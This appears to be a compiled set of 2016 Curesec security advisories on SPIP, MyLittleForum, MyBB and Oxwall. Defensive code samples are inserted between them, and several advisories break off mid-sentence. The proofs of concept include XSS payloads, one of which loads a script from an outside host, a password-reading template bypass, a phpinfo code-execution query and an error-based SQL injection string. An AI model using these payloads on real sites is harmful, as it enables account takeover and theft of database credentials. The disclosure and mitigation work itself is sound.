attacker can request a password reset email for a user and set the Host header
to a server they control. As this header is used in the email, the user would
be sent to the attacker's server if they clicked on the link, leading to the
leakage of the recovery token and thus the compromise of the account.

Proof of Concept:

Request:

POST /spip/spip.php?page=spip_pass&lang=en HTTP/1.1
Host: example.com
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: spip_accepte_ajax=1; spip_admin=%40admin; PHPSESSID=1l8rvbhcgia45ddj7ldoc1gpf6; wb-installer=3d2hes1b6i0bfb586iucm76sp2; wb-4174-sid=u571gr7isplq8b4f01fniqevk2
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 199

page=spip_pass&lang=en&formulaire_action=oubli&formulaire_action_args=orESpF0vSC3Q%2BB30uGEFqT7k6AcDObDMasMNzVp3EjndtlvZ%2B5k4g%2FkyF%2BAlzhBhCI%2F%2F9hx%2FZ33mkQPk&oubli=visitor%40example.com&nobot=

Email sent:

[My SPIP site] Forgotten password (this is an automated message)

To recover your access to the site My SPIP site (http://localhost/spip)
Please go to the following address:
http://example.com/spip/spip.php?page=spip_pass&p=107017475657c15ad6e9c781.23674073
You can then enter a new password and log in to the site.
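Added example (not SPIP's code): building the reset link from a configured site URL and checking the Host header against an allowlist, beside the Host-derived construction the advisory describes. SITE_URL, ALLOWED_HOSTS and the token value are placeholders invented for the example.

```python
# Constructed configuration: the canonical site URL comes from here, never
# from the request. Not SPIP's code or settings.
SITE_URL = "https://spip.example.org/spip"
ALLOWED_HOSTS = {"spip.example.org"}


class BadHostHeader(ValueError):
    pass


def request_host(headers):
    """Host from the request, without port, lower-cased. Forwarding headers
    such as X-Forwarded-Host are deliberately ignored here; honour them only
    when a trusted reverse proxy is known to set them."""
    return headers.get("Host", "").split(":")[0].strip().lower()


def reset_link_vulnerable(token, headers):
    # The pattern the advisory describes: whatever Host the client sent
    # becomes the origin of the link that is mailed to the user.
    return "http://%s/spip/spip.php?page=spip_pass&p=%s" % (headers["Host"], token)


def reset_link(token, headers):
    """Reject requests for unknown hosts early, then build the link from the
    configured site URL so the mailed link can only ever point at our site."""
    host = request_host(headers)
    if host not in ALLOWED_HOSTS:
        raise BadHostHeader("unexpected Host header: %r" % host)
    return "%s/spip.php?page=spip_pass&p=%s" % (SITE_URL, token)


def reset_link_or_none(token, headers):
    """Convenience wrapper for callers that prefer None over an exception."""
    try:
        return reset_link(token, headers)
    except BadHostHeader:
        return None
```

Rejecting unknown hosts at the front door (web server virtual host or framework allowed-hosts setting) covers every code path that might otherwise read the header, not only the reset mail.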

httpOnly Cookie Disclosure

Description: The phpinfo page discloses httpOnly cookies such as session
cookies, making it slightly easier to exploit XSS vulnerabilities.

Proof of Concept:

http://localhost/spip/ecrire/?exec=info

4. Solution

To mitigate this issue please upgrade at least to version 3.1.2:

http://www.spip.net/en_download

Please note that a newer version might already be available.

5. Report Timeline

09/05/2016 Informed Vendor about Issue
09/23/2016 Vendor releases fix
11/10/2016 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/SPIP-31-XSS-amp-Host-Header-Injection-178.html
 

[FD] MyLittleForum 2.3.6.1: XSS & RPO

2016-11-18 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    MyLittleForum 2.3.6.1
Fixed in:            2.3.7beta
Fixed Version Link:  https://github.com/ilosuna/mylittleforum/releases/tag/v2.3.7beta
Vendor Website:      http://mylittleforum.net/
Vulnerability Type:  XSS & RPO
Remote Exploitable:  Yes
Reported to vendor:  09/05/2016
Disclosed to public: 11/10/2016
Release mode:        Coordinated Release
CVE:                 n/a
Credits:             Tim Coen of Curesec GmbH

2. Overview

MyLittleForum is forum software written in PHP. In version 2.3.6.1, it is
vulnerable to reflected cross site scripting as well as relative path
overwrite. XSS can be used to steal cookies, inject JavaScript keyloggers, or
bypass CSRF protection, and RPO may lead to CSS injection.

3. Details

Reflected XSS

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description: The username and email parameters of the add user page are
vulnerable to reflected XSS.

Proof of Concept:

[HTML form posting to http://localhost/mylittleforum-2.3.6.1/index.php with method="POST"; only a fragment of one field value survived the archive: alert(1)" />]

Relative Path Overwrite

Description: Because the application includes CSS files via relative instead of
absolute paths, an attacker can overwrite the path. With some browsers, this
may lead to CSS injection.

Proof of Concept:

http://localhost/mylittleforum-2.3.6.1/index.php?id=1

4. Solution

To mitigate this issue please upgrade at least to version 2.3.7beta:

https://github.com/ilosuna/mylittleforum/releases/tag/v2.3.7beta

Please note that a newer version might already be available.

5. Report Timeline

09/05/2015 Informed Vendor about Issue (no reply)
09/15/2015 Reminded Vendor of Disclosure Date
09/15/2015 Vendor replies
10/04/2015 Vendor releases fix
11/10/2016 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/MyLittleForum-2361-XSS-amp-RPO-179.html
 

[FD] MyBB 1.8.6: XSS

2016-11-10 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    MyBB 1.8.6
Fixed in:            1.8.7
Fixed Version Link:  http://resources.mybb.com/downloads/mybb_1807.zip
Vendor Website:      http://www.mybb.com/
Vulnerability Type:  XSS
Remote Exploitable:  Yes
Reported to vendor:  01/29/2016
Disclosed to public: 09/15/2016
Release mode:        Coordinated Release
CVE:                 n/a
Credits:             Tim Coen of Curesec GmbH

2. Overview

MyBB is forum software written in PHP. In version 1.8.6, it contains various
XSS vulnerabilities, some of which are reflected and some of which are
persistent. Some of them depend on custom forum or server settings.

These issues may lead to the injection of JavaScript keyloggers, injection of
content such as ads, or the bypassing of CSRF protection, which would for
example allow the creation of a new admin user.

3. Details

XSS 1: Persistent XSS - Signature

CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N

Description: The profile editor of the moderator control panel does not
properly encode the signature of a user when editing it. Because of this, a
user can create a specifically crafted signature and - once a moderator or
admin visits the profile editor for that user - the injected code will be
executed in the context of the victim's browser.

Proof of Concept:

Visit the profile at: http://localhost/mybb_1806/Upload/modcp.php?action=editprofile&uid=[USER_ID]

As signature, use: [the payload did not survive the archive]

XSS 2: Persistent XSS - Forum Post (depending on forum settings)

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description: An admin can allow HTML input for specific forums via the setting
allowhtml. There are various filters in place which intend to make this safe,
which may leave the admin with the impression that it is indeed safe. However,
there are various possibilities to bypass these filters, mainly using HTML5
features.

Proof of Concept:

[the HTML payloads did not survive the archive; the surviving trigger notes are:]
-> Visiting the post will trigger the code
context menu -> A right-click will trigger the code
Enter something: -> Input into the field will trigger the code
-> A click on submit will trigger the code

There are various other attributes which may also work, such as onsearch,
onkeydown, onkeyup, ondrag, onscroll, oncopy, and so on. Other attributes such
as onMouseOver or onFocus are filtered out.
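Added example (not MyBB's code): an allowlist HTML sanitizer built on Python's html.parser, in contrast to the blocklist filtering described above. Tags and attributes not on the allowlist, which includes every on* handler and any new HTML5 element, are dropped without anyone having to enumerate them. The allowlist itself is constructed for the example.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed allowlist: tag -> attributes it may carry. Anything absent is dropped.
ALLOWED_TAGS = {
    "b": set(), "i": set(), "u": set(), "strong": set(), "em": set(),
    "p": set(), "br": set(), "code": set(),
    "a": {"href", "title"},
    "img": {"src", "alt"},
}
URL_ATTRIBUTES = {"href", "src"}
SAFE_SCHEMES = {"http", "https"}
VOID_TAGS = {"br", "img"}
DROP_CONTENT = {"script", "style"}


class AllowlistSanitizer(HTMLParser):
    """Rebuilds a fragment from parsed tokens, keeping only allowlisted tags
    and attributes. Event handlers are never on the allowlist, so on* attributes
    and unknown tags disappear regardless of how they are spelled."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.dropping = 0  # >0 while inside <script>/<style>: discard text too

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT:
            self.dropping += 1
            return
        if tag not in ALLOWED_TAGS:
            return
        rendered = []
        for name, value in attrs:
            if name not in ALLOWED_TAGS[tag] or value is None:
                continue
            if name in URL_ATTRIBUTES:
                try:
                    scheme = urlsplit(value.strip()).scheme.lower()
                except ValueError:
                    continue
                if scheme not in SAFE_SCHEMES:
                    continue  # javascript:, data: and relative URLs are all dropped here
            rendered.append(' %s="%s"' % (name, html.escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(rendered)))

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT:
            self.dropping = max(0, self.dropping - 1)
        elif tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self.dropping:
            self.out.append(html.escape(data, quote=False))


def sanitize(fragment):
    parser = AllowlistSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)
```

The output is re-serialized from tokens rather than patched with regular expressions, so malformed markup cannot smuggle an attribute past the filter; the price is that anything the allowlist does not name, including relative links in this sketch, is lost.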

XSS 3: Persistent XSS - Username (depending on forum settings)

CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N

Description: The username is echoed unencoded in the user area. As the login
does not have CSRF protection and as an admin can be logged into the admin area
with a different account than the one they are logged into the forum, a
persistent XSS vulnerability in the user area can be exploited. However,
successful exploitation most likely requires a username length of at least 43
characters, which is more than the default settings allow.

Simple Proof of Concept:

1. Register a user with the name: f" onmouseover="alert(1)" b="
2. Log in and visit http://localhost/mybb_1805/Upload/usercp.php
3. Hover over the avatar

The simple proof of concept can be improved to allow successful exploitation.
It is not required for the victim to hover over the avatar or interact with the
webpage in any way:

1. As username, use: f" onerror="alert(1)" b="
2. Set an avatar, and use a URL as source (not an image upload)
3. Delete the image from the remote host, making it unavailable, thus
   triggering an error and executing the injected code.

Possible Payloads:

Loading a script with vanilla javascript takes a lot more characters than are
allowed in a username by default:

"onerror="s=document.createElement('script');s.src='http://localhost/s.js';
document.getElementById('top').appendChild(s)"

As jQuery is loaded, this can be optimized:

"onerror="$.getScript('http://aa.bc/s.js')

Executing the payload for a victim:

The attack does not require the victim to be logged out as a normal user first,
as one can log in even when already logged in. The login as a normal user also
does not affect the login as admin. Thus, an attacker could use the following
payload to log a victim in and redirect them to the site containing the
payload:

[HTML form posting to http://localhost/mybb_1805/Upload/member.php (target="myframe", id="myform", name="myform"); most of its markup did not survive the archive, only this closing fragment did:]
http://localhost/s.js')" />document.myform.submit();

It will automatically log the victim in and redirect them to the page that
triggers the script execution. No action of the victim is required. The loaded
script could for example perform a backup of the database and then send the
attacker the name of the backup, as backups are stored in a public directory.

XSS 4: Persistent XSS - Post Attachment (depending on server settings)

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description: Attachments are uploaded to a public directory, and their
extension is changed to .attach. Files with extension .attach that contain HTML
code are interpreted as HTML files by some default server configurations (for
example Apache). Additionally, t

[FD] Oxwall 1.8.0: XSS & Open Redirect

2016-09-15 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    Oxwall 1.8.0 (build 9900)
Fixed in:            1.8.2
Fixed Version Link:  https://developers.oxwall.com/download
Vendor Website:      http://www.oxwall.org/
Vulnerability Type:  XSS & Open Redirect
Remote Exploitable:  Yes
Reported to vendor:  11/21/2015
Disclosed to public: 09/15/2016
Release mode:        Coordinated Release
CVE:                 n/a
Credits:             Tim Coen of Curesec GmbH

2. Overview

Oxwall is a social networking software written in PHP. In version 1.8.0, it is
vulnerable to multiple XSS attacks and a persistent open redirect.

The XSS vulnerabilities are reflected as well as persistent, and can lead to
the stealing of cookies, injection of keyloggers, or the bypassing of CSRF
protection.

3. Details

XSS 1: Reflected XSS

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

When performing a ping request, the method value is echoed unencoded, leading
to reflected XSS.

Proof of Concept:

[HTML form posting to http://localhost/oxwall-1.8.0/base/ping/index/ with method="POST"; the hidden field's value did not survive the archive except for its tail: ","params":{}}]}]
Code:

ow_system_plugins/base/controllers/ping.php

        // $c['command'] is the command name taken from the request; it is
        // placed into the response array unchanged
        $responseStack[] = array(
            'command' => $c['command'],
            'result' => $event->getData()
        );
    }

    // the whole stack, request-supplied command names included, is echoed back
    echo json_encode(array(
        'stack' => $responseStack
    ));

XSS 2: Persistent XSS

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

The name of a photo album is vulnerable to persistent XSS in two places: when
viewing a user profile, and after editing the album. Both of these are
DOM-based XSS vulnerabilities, and both require some interaction from the
victim, e.g. hovering or clicking.

Proof of Concept:


0. Register an account
1. Create a new album with the name:
'">
2. Visit the user's profile:
http://localhost/oxwall-1.8.0/user/[username]
3. Hover over the image belonging to that album

An alternative to steps 2. and 3. is:

2. use CSRF to log the victim into the account with the injected album name
3. Use ClickJacking to get user to click "Edit Album" and then click "Done"

XSS 3: Self-XSS

CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N

The chat window is vulnerable to self-XSS. It may be possible to exploit this
issue via ClickJacking in some browsers.

Proof of Concept:


Open a chat and paste the following into the text field (there is no need to 
send it, although that would trigger the vulnerability again as well):
'">

Persistent Open Redirect

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

The real name of a user is echoed inside meta tags without proper encoding.
Tags are stripped, which prevents an attacker from adding new tags, but it is
still possible to add additional attributes to the meta tag, leading to an open
redirect and potentially XSS in older browsers.

Proof of Concept:


1. Register a new user. As real name use:
5;URL=http://google.com/"; http-equiv="refresh" foo="
2. Visit the profile of that user:
http://localhost/oxwall-1.8.0/user/[username]

4. Solution

To mitigate this issue please upgrade at least to version 1.8.2.

Please note that a newer version might already be available.

5. Report Timeline

11/21/2015 Informed Vendor about Issue (no reply)
12/10/2015 Reminded Vendor of Disclosure Date
12/15/2015 Vendor requests more time
01/13/2016 Contacted Vendor, Vendor requests more time
02/01/2016 Contacted Vendor, Vendor requests more time
02/22/2016 Vendor releases fix
09/15/2016 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/Oxwall-180-XSS-amp-Open-Redirect-148.html
 

[FD] MyBB 1.8.6: Improper validation of data passed to eval

2016-09-15 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    MyBB 1.8.6
Fixed in:            1.8.7
Fixed Version Link:  http://resources.mybb.com/downloads/mybb_1807.zip
Vendor Website:      http://www.mybb.com/
Vulnerability Type:  Improper validation of data passed to eval
Remote Exploitable:  Yes
Reported to vendor:  01/29/2016
Disclosed to public: 09/15/2016
Release mode:        Coordinated Release
CVE:                 n/a
Credits:             Tim Coen of Curesec GmbH

2. Overview

MyBB is forum software written in PHP. In version 1.8.6, it improperly
validates templates that are passed to eval, allowing for the disclosure of the
database password. If the database is writable from remote, it may also lead to
code execution.

An admin account is required.

3. Details

Description

CVSS: Low 3.5 AV:N/AC:M/Au:S/C:P/I:N/A:N

MyBB allows an admin to edit templates. These templates can contain HTML, and
it is possible to read out the content of PHP variables as well as the
properties of objects. There are filters in place which should make it
impossible to call functions or to read out sensitive information such as
database credentials.

Templates are used as follows:

eval('$variable = "'.$templates->get('templateName').'";');

$templates->get returns the template as saved in the database, with double
quotes and slashes escaped.

When saving a template, the template is passed to the check_template function
to check if it contains malicious content. The checks try to prevent the
reading of the database password as well as the calling of functions. This
means that none of the naive attempts to read out the database password - e.g.
$config['database']['password'], $config[database][password], or
$config["database"]["password"] - would work.

However, it is still possible to read out the database password by setting the
value of an existing variable to "password" and using that variable when
reading out the password, thus bypassing the filter.

Proof of Concept

First, edit a template such as the usercp_profile_contact_fields_field template:

http://localhost/mybb_1806/Upload/admin/index.php?module=style-templates&action=edit_template&title=usercp_profile_contact_fields_field&sid=1&expand=15

Add this line at the beginning:
{$cfvalue}: {$config['database'][$cfvalue]}

Now, visit the profile:
http://localhost/mybb_1806/Upload/usercp.php?action=profile

As any of the "Additional Contact Information" values, use "password" to read
out the database password, "hostname" to read out the hostname, and "username"
to read out the user.

In case that the database is writable from remote, an attacker could now also
gain code execution, as check_template is applied when saving templates, not
when loading them. Example query:

UPDATE mybb_templates SET template="{${phpinfo()}}" WHERE title=
"usercp_profile_contact_fields_field";

Visiting the profile will execute the injected code.

Code

inc/config.php

$config['database']['password'] = '[THE_DATABASE_PASSWORD]';

admin/inc/functions.php

function check_template($template)
{
    // Check to see if our database password is in the template
    if(preg_match("#database'?\\s*\]\\s*\[\\s*'?password#", $template))
    {
        return true;
    }

    // System calls via backtick
    if(preg_match('#\$\s*\{#', $template))
    {
        return true;
    }

    // Any other malicious acts?
    // Courtesy of ZiNgA BuRgA
    if(preg_match("~\\{\\$.+?\\}~s", preg_replace('~\\{\\$+[a-zA-Z_][a-zA-Z_0-9]*((?:-\\>|\\:\\:)\\$*[a-zA-Z_][a-zA-Z_0-9]*|\\[\s*\\$*([\'"]?)[a-zA-Z_ 0-9 ]+\\2\\]\s*)*\\}~', '', $template)))
    {
        return true;
    }

    return false;
}

usercp.php (as one example)

foreach(array('icq', 'aim', 'yahoo', 'skype', 'google') as $cfield)
{
    $contact_fields[$cfield] = '';
    $csetting = 'allow'.$cfield.'field';
    if($mybb->settings[$csetting] == '')
    {
        continue;
    }

    if(!is_member($mybb->settings[$csetting]))
    {
        continue;
    }

    $cfieldsshow = true;

    $lang_string = 'contact_field_'.$cfield;
    $lang_string = $lang->{$lang_string};
    $cfvalue = htmlspecialchars_uni($user[$cfield]);

    eval('$contact_fields[$cfield] = "'.$templates->get('usercp_profile_contact_fields_field').'";');
}
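Added example (not MyBB's code): a Python stand-in for a {$var}-style template renderer that resolves placeholders by dictionary lookup against an explicit set of exposed names, so the indirection above ({$config['database'][$cfvalue]}) is rejected rather than evaluated. check_template's first blocklist pattern is re-expressed beside it to show what that pattern does and does not catch. The placeholder grammar is a simplification constructed for the example.

```python
import re

# Constructed Python stand-in for a {$var}-style template renderer; not MyBB's
# code. Placeholders are resolved by dictionary lookups against an explicit
# allowlist of exposed names, never by handing template text to eval().
PLACEHOLDER = re.compile(r"\{\$([a-zA-Z_][a-zA-Z_0-9]*)((?:\[[^\]]*\])*)\}")
SUBSCRIPT = re.compile(r"\[([^\]]*)\]")


class TemplateError(ValueError):
    pass


def render(template, exposed):
    """exposed: the only names this template may read, e.g. {"cfvalue": "..."}.
    Undeclared names such as $config, variable indirection such as [$cfvalue],
    and any brace syntax the grammar does not know are errors, not evaluation."""
    leftover = PLACEHOLDER.sub("", template)
    if "{$" in leftover:
        # e.g. {${phpinfo()}}: a brace construct the grammar does not consume
        raise TemplateError("unsupported placeholder syntax")

    def substitute(match):
        name, subscripts = match.group(1), match.group(2)
        if name not in exposed:
            raise TemplateError("undeclared variable $" + name)
        value = exposed[name]
        for key in SUBSCRIPT.findall(subscripts):
            key = key.strip()
            if key.startswith("$"):
                raise TemplateError("variable indirection is not allowed: " + key)
            key = key.strip("'\"")
            if not isinstance(value, dict) or key not in value:
                raise TemplateError("unknown key %r on $%s" % (key, name))
            value = value[key]
        if not isinstance(value, str):
            raise TemplateError("$%s does not resolve to a string" % name)
        return value

    return PLACEHOLDER.sub(substitute, template)


def try_render(template, exposed):
    """None instead of an exception, for callers and tests that only need pass/fail."""
    try:
        return render(template, exposed)
    except TemplateError:
        return None


def blocklist_flags_password(template):
    """check_template's first pattern, re-expressed in Python: it matches the
    literal spellings it was written for and nothing else."""
    return re.search(r"database'?\s*\]\s*\[\s*'?password", template) is not None
```

The renderer never sees $config because the caller decides what goes into `exposed`; a blocklist has to predict every spelling of a forbidden access, an allowlist of data only has to name the permitted ones.
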

4. Solution

To mitigate this issue please upgrade at least to version 1.8.7:

http://resources.mybb.com/downloads/mybb_1807.zip

Please note that a newer version might already be available.

5. Report Timeline

01/29/2016 Informed Vendor about Issue
02/26/2016 Vendor requests more time
03/11/2016 Vendor releases fix
09/15/2016 Di

[FD] MyBB 1.8.6: SQL Injection

2016-09-15 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    MyBB 1.8.6
Fixed in:            1.8.7
Fixed Version Link:  http://resources.mybb.com/downloads/mybb_1807.zip
Vendor Website:      http://www.mybb.com/
Vulnerability Type:  SQL Injection
Remote Exploitable:  Yes
Reported to vendor:  01/29/2016
Disclosed to public: 09/15/2016
Release mode:        Coordinated Release
CVE:                 n/a
Credits:             Tim Coen of Curesec GmbH

2. Overview

MyBB is forum software written in PHP. In version 1.8.6, it is vulnerable to a
second order SQL injection by an authenticated admin user, allowing the
extraction of data from the database.

3. Details

Description

CVSS: Medium 6.0 AV:N/AC:M/Au:S/C:P/I:P/A:P

The setting threadsperpage is vulnerable to second order error based SQL
injection. An admin account is needed to change this setting.

The injection takes place in a LIMIT clause, and the query also uses ORDER BY,
so a UNION ALL injection is not possible. It is still possible to extract
information, for example through an error-based injection as shown below.

Proof of Concept

Go to the settings page:

http://localhost/mybb_1806/Upload/admin/index.php?module=config-settings&action=change&gid=7

For Setting "threadsperpage" use:
20 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);

Visit a forum to trigger injected code:
http://localhost/mybb_1806/Upload/forumdisplay.php?fid=3

The result will be:
SQL Error:
1105 - XPATH syntax error: ':5.5.33-1'
Query:
SELECT t.*, (t.totalratings/t.numratings) AS averagerating, t.username 
AS threadusername, u.username FROM mybb_threads t LEFT JOIN mybb_users u ON 
(u.uid = t.uid) WHERE t.fid='3' AND t.visible IN (-1,0,1) ORDER BY t.sticky 
DESC, t.lastpost desc LIMIT 0, 20 procedure 
analyse(extractvalue(rand(),concat(0x3a,version())),1); 

Code

forumdisplay.php
$perpage = $mybb->settings['threadsperpage'];
[...]
$query = $db->query("
    SELECT t.*, {$ratingadd}t.username AS threadusername, u.username
    FROM ".TABLE_PREFIX."threads t
    LEFT JOIN ".TABLE_PREFIX."users u ON (u.uid = t.uid)
    WHERE t.fid='$fid' $tuseronly $tvisibleonly $datecutsql2 $prefixsql2
    ORDER BY t.sticky DESC, {$t}{$sortfield} $sortordernow $sortfield2
    LIMIT $start, $perpage
");
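The following PHP is an added example and not MyBB code. It shows why the sink in forumdisplay.php is the right place to enforce the type of a stored setting (a second-order value can reach the query by routes other than the admin form), how a LIMIT operand is bound as an integer, and a small audit helper for an installed instance. It assumes the pdo_sqlite extension for the stand-alone run; the table, rows and the settings array are constructed.

```php
<?php
// Added example, not MyBB code. The second-order sink from forumdisplay.php is
// a setting read back from the database and interpolated into LIMIT. The
// hardened variant validates the value again at the sink and binds it as an
// integer, so the admin form is no longer the only line of defence.

// Vulnerable pattern (mirrors the advisory): the stored setting is trusted as-is.
function buildQueryVulnerable(int $start, $perpage): string
{
    return "SELECT t.* FROM mybb_threads t ORDER BY t.sticky DESC LIMIT $start, $perpage";
}

// Strict validation: rejects "20 procedure analyse(...)" outright instead of
// silently truncating it to 20 the way a plain (int) cast would.
function validateThreadsPerPage($value): int
{
    $n = filter_var($value, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => 500]]);
    if ($n === false) {
        throw new InvalidArgumentException('threadsperpage must be an integer in 1..500');
    }
    return $n;
}

// Hardened query: a placeholder for every operand, LIMIT bound as PARAM_INT
// (bound as a string the driver would quote it and the statement would fail).
function fetchThreads(PDO $db, string $fid, int $start, $perpage): array
{
    $limit = validateThreadsPerPage($perpage);
    $stmt = $db->prepare(
        'SELECT t.* FROM mybb_threads t WHERE t.fid = :fid ORDER BY t.sticky DESC LIMIT :start, :limit'
    );
    $stmt->bindValue(':fid', $fid, PDO::PARAM_STR);
    $stmt->bindValue(':start', $start, PDO::PARAM_INT);
    $stmt->bindValue(':limit', $limit, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Audit helper for an existing installation: settings that should be numeric
// but are not are exactly the stored payloads this advisory describes.
function findNonNumericSettings(array $settings, array $numericKeys): array
{
    $suspicious = [];
    foreach ($numericKeys as $key) {
        if (isset($settings[$key]) && filter_var($settings[$key], FILTER_VALIDATE_INT) === false) {
            $suspicious[$key] = $settings[$key];
        }
    }
    return $suspicious;
}

// Stand-alone demonstration with an in-memory SQLite database (constructed data).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE mybb_threads (tid INTEGER PRIMARY KEY, fid TEXT, sticky INTEGER, subject TEXT)');
$db->exec("INSERT INTO mybb_threads (fid, sticky, subject) VALUES ('3', 1, 'pinned'), ('3', 0, 'first'), ('3', 0, 'second')");

// Constructed settings row carrying the value from the proof of concept.
$settings = ['threadsperpage' => '20 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)'];

echo buildQueryVulnerable(0, $settings['threadsperpage']), "\n"; // payload lands in the query verbatim
print_r(findNonNumericSettings($settings, ['threadsperpage', 'postsperpage']));

try {
    fetchThreads($db, '3', 0, $settings['threadsperpage']);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
print_r(fetchThreads($db, '3', 0, '2')); // two rows, the sticky thread first
```

The audit helper is the quick check to run after upgrading: any numeric setting whose stored value fails FILTER_VALIDATE_INT was tampered with before the fix and will still be served from the settings cache until it is corrected.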

4. Solution

To mitigate this issue please upgrade at least to version 1.8.7:

http://resources.mybb.com/downloads/mybb_1807.zip

Please note that a newer version might already be available.

5. Report Timeline

01/29/2016 Informed Vendor about Issue
02/26/2016 Vendor requests more time
03/11/2016 Vendor releases fix
09/15/2016 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/MyBB-186-SQL-Injection-159.html
 
--
blog:  https://www.curesec.com/blog
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] MyBB 1.8.6: CSRF, Weak Hashing, Plaintext Passwords

2016-09-15 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:MyBB 1.8.6
Fixed in:not fixed
Fixed Version Link:  n/a
Vendor Website:  http://www.mybb.com/
Vulnerability Type:  CSRF, Weak Hashing, Plaintext Passwords
Remote Exploitable:  Yes
Reported to vendor:  01/29/2016
Disclosed to public: 09/15/2016
Release mode:Full Disclosure / Informational
CVE: n/a
Credits  Tim Coen of Curesec GmbH

2. Overview

MyBB 1.8.6 is vulnerable to login CSRF. Additionally, it stores passwords using
weak hashing, and sends passwords via email in plaintext.

3. Login CSRF

Description

CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N

The login of MyBB does not have any CSRF protection. The impact of this is low,
but a victim could provide sensitive information under a fake account. An
example would be the accidental sending of a sensitive private message while
being logged into an account controlled by an attacker.

Additionally, a login CSRF makes it possible to exploit vulnerabilities that may
exist in the user area, such as XSS.

Proof of Concept

  http://localhost/mybb_1806/Upload/member.php";
method="POST">  http://localhost/mybb_1806/Upload/index.php"; />
   


4. Weak Hashing

Description

MyBB uses md5 for hashing passwords, which is not considered secure.

The hashing used is:

$hash = md5(md5($salt).md5($password));

5. Passwords Emailed in Plaintext

Description

When passwords are reset, the generated 8 character password is sent to the
user via email in plaintext. It is suggested that users change these passwords,
but a change is not required.

It is recommended to use a password reset token instead, and to force the user
to create a new password themselves.
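The PHP below is an added example and not MyBB code. It puts the md5 construction quoted in section 4 next to password_hash(), migrates a legacy record transparently on the next successful login (the only moment the plaintext is available), and implements the reset flow section 5 recommends: a random single-use token, stored only as a hash with an expiry, mailed as a link, after which the user sets a new password. The user row and token store are constructed arrays standing in for database tables.

```php
<?php
// Added example, not MyBB code. Legacy md5 scheme beside password_hash(),
// an in-place upgrade on login, and a hashed, expiring, single-use reset token.

// The scheme the advisory quotes, reproduced only so the migration can verify it.
function legacyHash(string $salt, string $password): string
{
    return md5(md5($salt) . md5($password));
}

// bcrypt via password_hash(): per-user salt and a tunable work factor.
function hashPassword(string $password): string
{
    return password_hash($password, PASSWORD_BCRYPT, ['cost' => 12]);
}

// Verifies a login and migrates a legacy record in place on success.
// $user is a constructed row: ['password' => ..., 'legacy_salt' => ...].
function verifyAndUpgrade(array &$user, string $password): bool
{
    if (isset($user['legacy_salt'])) {
        $ok = hash_equals($user['password'], legacyHash($user['legacy_salt'], $password));
        if ($ok) {
            $user['password'] = hashPassword($password); // plaintext is available only now
            unset($user['legacy_salt']);
        }
        return $ok;
    }
    $ok = password_verify($password, $user['password']);
    if ($ok && password_needs_rehash($user['password'], PASSWORD_BCRYPT, ['cost' => 12])) {
        $user['password'] = hashPassword($password); // cost was raised since this hash was made
    }
    return $ok;
}

// Reset tokens: the raw token goes into the e-mail link, only its hash is
// stored, it expires, and it is consumed on first use. No password is mailed.
function issueResetToken(array &$tokens, string $uid, int $now, int $ttl = 3600): string
{
    $token = bin2hex(random_bytes(32));
    $tokens[$uid] = ['hash' => hash('sha256', $token), 'expires' => $now + $ttl];
    return $token;
}

function redeemResetToken(array &$tokens, string $uid, string $token, int $now): bool
{
    if (!isset($tokens[$uid])) {
        return false;
    }
    $record = $tokens[$uid];
    unset($tokens[$uid]); // single use, whether or not it verifies
    return $now <= $record['expires'] && hash_equals($record['hash'], hash('sha256', $token));
}

// Stand-alone demonstration with constructed data.
$user = ['legacy_salt' => 'abcd1234', 'password' => legacyHash('abcd1234', 'correct horse')];
var_dump(verifyAndUpgrade($user, 'wrong'));          // false, record untouched
var_dump(verifyAndUpgrade($user, 'correct horse'));  // true, record now holds a bcrypt hash
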